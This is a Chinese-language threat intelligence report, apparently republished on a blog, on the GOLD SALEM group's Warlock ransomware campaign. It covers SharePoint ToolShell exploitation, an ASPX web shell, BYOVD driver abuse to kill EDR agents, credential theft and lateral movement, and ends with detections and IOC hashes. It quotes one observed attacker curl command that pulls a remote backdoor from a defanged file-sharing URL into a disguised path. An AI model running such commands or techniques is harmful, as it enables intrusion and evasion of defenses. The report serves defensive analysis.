Warlock勒索软件技术分析与防御指南

本文深入分析GOLD SALEM组织的Warlock勒索软件行动,涵盖其攻击手法、技术细节和防御措施,包括SharePoint漏洞利用、BYOVD技术绕过EDR检测等关键技术特征。

GOLD SALEM的Warlock行动加入繁忙的勒索软件领域

新兴组织展示了使用熟悉的勒索软件手法和独创性暗示的熟练技术

受害者概况和在线活动

截至2025年9月中旬,该组织公布的60名受害者在同期勒索软件行动中排名居中。GOLD SALEM的受害者范围从小型商业或政府实体到遍布北美、欧洲和南美的大型跨国公司。与大多数勒索软件组织一样,GOLD SALEM在很大程度上避免攻击位于中国和俄罗斯的组织,尽管这些地区存在大量潜在目标。

GOLD SALEM在2025年6月之前没有公开足迹,当时一个代表该组织的人物在RAMP地下论坛发帖,征求常见企业应用程序(如Veeam、ESXi、SharePoint)的漏洞利用以及终止端点检测和响应(EDR)系统和其他安全产品的工具。

观察到的事件

2025年7月下旬,CTU研究人员分析了一起事件,其中GOLD SALEM使用ToolShell漏洞利用链针对SharePoint服务器进行初始访问。该漏洞利用链依赖于组合使用漏洞CVE-2025-49704、CVE-2025-49706、CVE-2025-53770和CVE-2025-53771。

利用导致放置了一个ASPX Web Shell,在IIS工作进程(w3wp.exe)上下文中为cmd.exe创建了一个Process对象。攻击者随后可以远程执行任意命令并查看任何结果输出。CTU研究人员观察到通过此Web Shell发出的以下命令:

1
curl -L -o c:\\users\\public\\Sophos\\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt

下载的可执行文件是基于Golang的WebSockets服务器,允许独立于Web Shell持续访问受感染的服务器。

CTU研究人员还观察到GOLD SALEM通过使用自带易受攻击驱动程序(BYOVD)技术和重命名为googleApiUtil64.sys的易受攻击百度杀毒驱动程序来绕过EDR,终止EDR代理。此驱动程序中的缺陷(CVE-2024-51324)允许终止任意进程。

微软对该组织的分析指出执行了Mimikatz“专门针对本地安全机构子系统服务(LSASS)内存以提取明文凭证”。微软还观察到使用PsExec和Impacket进行横向移动,以及使用组策略对象(GPO)部署Warlock有效负载。

缓解措施和检测

组织应实施定期攻击面监控,并制定面向互联网服务的积极修补策略。零日漏洞利用的检测和缓解需要主动的端点监控和及时的事件响应。

以下Sophos防护检测与此威胁相关的活动:

  • Troj/WebShel-F
  • Troj/Warlock-B

为减轻对此威胁的暴露,CTU研究人员建议客户使用可用控制措施,审查和限制使用表1中列出的指标进行访问。

指标 类型 上下文
bfbeac96a385b1e5643ec0752b132506 MD5哈希 GOLD SALEM在SharePoint ToolShell利用后使用的ASPX Web Shell
de25be0afd53a1d274eec02e5303622fc8e7dbd5 SHA1哈希 GOLD SALEM在SharePoint ToolShell利用后使用的ASPX Web Shell
996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1 SHA256哈希 GOLD SALEM在SharePoint ToolShell利用后使用的ASPX Web Shell
b3a099ecca79503a0e4a154bd85d3e6b MD5哈希 GOLD SALEM使用的WebSockets远程访问工具(wsocks.exe.txt)
6d0cc6349a951f0b52394ad3436d1656ec5fba6a SHA1哈希 GOLD SALEM使用的WebSockets远程访问工具(wsocks.exe.txt)
a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4 SHA256哈希 GOLD SALEM使用的WebSockets远程访问工具(wsocks.exe.txt)

表1:此威胁的指标

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计